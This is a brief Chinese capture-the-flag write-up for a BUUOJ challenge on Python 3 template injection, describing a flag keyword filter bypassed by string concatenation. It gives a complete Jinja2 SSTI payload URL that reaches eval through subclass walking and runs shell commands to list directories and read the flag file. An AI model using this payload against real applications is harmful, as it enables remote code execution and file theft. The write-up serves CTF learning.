hebtu-Enoki-qu

python3的模板注入

非常简单。。。就是直接执行命令就行。。虽然过滤了flag,但是拼接下就好了。。。。

payload:
http://fd5883ee-b8e2-4bf1-88af-33936a182228.node3.buuoj.cn/qaq?name={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}{%%20if%20c.__name__==%27catch_warnings%27%20%}{{%20c.__init__.__globals__[%27__builtins__%27].eval(%22__import__(%27os%27).popen(%27ls%20./;ls%20./../../../;cat%20../fl%22+%22ag%27).read()%22)%20}}{%%20endif%20%}{%%20endfor%20%}

分类:

技术点:

相关文章:

  • 2021-04-08
  • 2021-06-04
  • 2021-08-17
  • 2021-08-06
  • 2021-12-18
  • 2022-12-23
  • 2022-01-01
猜你喜欢
  • 2021-11-26
  • 2022-12-23
  • 2021-11-27
  • 2021-08-29
  • 2021-06-21
  • 2021-11-13
  • 2021-09-10
相关资源
相似解决方案